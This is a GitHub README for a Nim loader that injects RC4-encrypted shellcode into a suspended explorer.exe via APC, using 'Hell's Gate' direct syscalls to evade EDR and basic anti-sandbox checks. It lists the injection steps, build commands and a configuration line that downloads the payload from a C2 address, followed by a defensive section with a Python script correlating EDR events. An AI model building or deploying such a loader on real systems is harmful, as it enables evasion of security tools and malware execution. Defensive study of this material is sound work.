hadhub/nim-loader
Shellcode Injection via Direct Syscalls (Hell's Gate)

Overview

This project demonstrates advanced Windows process injection techniques using direct system calls to bypass EDR (Endpoint Detection and Response) hooks. It implements the "Hell's Gate" technique to extract syscall numbers directly from ntdll.dll and execute them without going through hooked API functions.

Features

  • Direct Syscall Execution: Bypasses userland API hooks by invoking syscalls directly
  • Hell's Gate Technique: Dynamically extracts syscall numbers from ntdll.dll at runtime
  • Process Hollowing: Creates a suspended process and injects shellcode via APC (Asynchronous Procedure Call)
  • RC4 Encryption: Downloads and decrypts shellcode from a remote server
  • Anti-Sandbox: Basic memory checks to detect virtual environments

Technical Implementation

Direct Syscalls

The project implements three core NT functions via direct syscalls:

  1. NtAllocateVirtualMemory - Allocates memory in the target process
  2. NtWriteVirtualMemory - Writes shellcode to allocated memory
  3. NtQueueApcThread - Queues an APC to execute the shellcode

Syscall Stub Generation

For each syscall, the code:

  1. Extracts the syscall number from the corresponding function in ntdll.dll
  2. Validates the function prologue pattern (4C 8B D1 B8)
  3. Generates a minimal assembly stub in executable memory
  4. Executes the syscall directly

Injection Flow

1. Download encrypted shellcode from C2 server
2. Decrypt using RC4
3. Create suspended explorer.exe process
4. Allocate RWX memory via NtAllocateVirtualMemory (syscall)
5. Write shellcode via NtWriteVirtualMemory (syscall)
6. Queue APC via NtQueueApcThread (syscall)
7. Resume thread to trigger execution

Requirements

  • Windows 10/11 (x64)
  • Nim compiler
  • Required Nim packages:
    • winim
    • httpclient
    • RC4

nimble install winim RC4

Compilation

Debug build:

nim c main.nim

For smaller binary size:

nim c -d:st3 main.nim

Configuration

Update the C2 server URL in the code:

data = client.getContent("http://192.168.1.19:8080/api_local")

Update the RC4 key:

key : string = "kernel32.dll"

Disclaimer

⚠️ FOR EDUCATIONAL PURPOSES ONLY

This code is provided for educational and research purposes to understand advanced malware techniques and improve defensive security measures. Unauthorized use of this code for malicious purposes is illegal and unethical.

  • Only use in authorized environments (your own lab, with explicit permission)
  • Never deploy against systems you don't own or have written permission to test
  • The authors assume no liability for misuse of this code

Detection & Defense

Security professionals can detect this technique by:

  • Monitoring for direct syscall execution patterns
  • Detecting unusual assembly stub creation in memory
  • Analyzing process creation with suspended threads
  • Monitoring APC queue operations
  • Network traffic analysis for encrypted payload downloads
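The bullets above are individual signals; a detection becomes reliable when they are correlated per source/target process pair into the chain described in the Injection Flow (suspended process creation, RWX allocation, remote write, APC queue, thread resume). The following is an added example, not code from this repository, run over constructed EDR-style events whose field names are assumed:

```python
from collections import defaultdict

# Constructed EDR-style telemetry (sample data, not real logs); field names are assumed.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4812, "ppid": 3220, "image": "explorer.exe",
     "flags": ["CREATE_SUSPENDED"]},
    {"type": "process_create", "pid": 5100, "ppid": 3220, "image": "notepad.exe", "flags": []},
    {"type": "remote_alloc", "source_pid": 3220, "target_pid": 4812,
     "protect": "PAGE_EXECUTE_READWRITE"},
    {"type": "remote_write", "source_pid": 3220, "target_pid": 4812, "size": 512},
    {"type": "apc_queue", "source_pid": 3220, "target_pid": 4812},
    {"type": "thread_resume", "source_pid": 3220, "target_pid": 4812},
    {"type": "remote_alloc", "source_pid": 3220, "target_pid": 5100, "protect": "PAGE_READWRITE"},
]

# Stages in the order the Injection Flow lists them (steps 3-7), and the
# minimum subset that should alert even if a loader skips or reorders steps.
CHAIN = ("suspended_create", "rwx_alloc", "remote_write", "apc_queue", "thread_resume")
REQUIRED = {"suspended_create", "rwx_alloc", "apc_queue"}


def stage_of(event):
    """Map one raw event to (source_pid, target_pid, stage), or None if unrelated."""
    t = event["type"]
    if t == "process_create" and "CREATE_SUSPENDED" in event.get("flags", []):
        return event["ppid"], event["pid"], "suspended_create"
    if t == "remote_alloc" and "EXECUTE" in event["protect"] and "WRITE" in event["protect"]:
        return event["source_pid"], event["target_pid"], "rwx_alloc"
    if t in ("remote_write", "apc_queue", "thread_resume"):
        return event["source_pid"], event["target_pid"], t
    return None


def detect_apc_injection(events):
    """Group stages per (source, target) pair; alert where the required subset is present."""
    seen = defaultdict(list)   # (source_pid, target_pid) -> ordered stages observed
    images = {}                # pid -> image name, for readable alerts
    for ev in events:
        if ev["type"] == "process_create":
            images[ev["pid"]] = ev["image"]
        hit = stage_of(ev)
        if hit and hit[2] not in seen[hit[:2]]:
            seen[hit[:2]].append(hit[2])
    alerts = []
    for (src, dst), stages in seen.items():
        if REQUIRED <= set(stages):
            alerts.append({"source_pid": src, "target_pid": dst,
                           "target_image": images.get(dst, "unknown"),
                           "stages": [s for s in CHAIN if s in stages]})
    return alerts
```

On the sample data this yields one alert for the 3220 -> 4812 (explorer.exe) pair and none for the benign PAGE_READWRITE allocation into notepad.exe; in a real pipeline the same grouping applies to whatever sensor emits these events, with a time window added between the first and last stage.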

License

This project is licensed under the MIT License - see the LICENSE file for details.

This project was generated in part with AI | Contributions and improvements welcome

About

simple nim loader
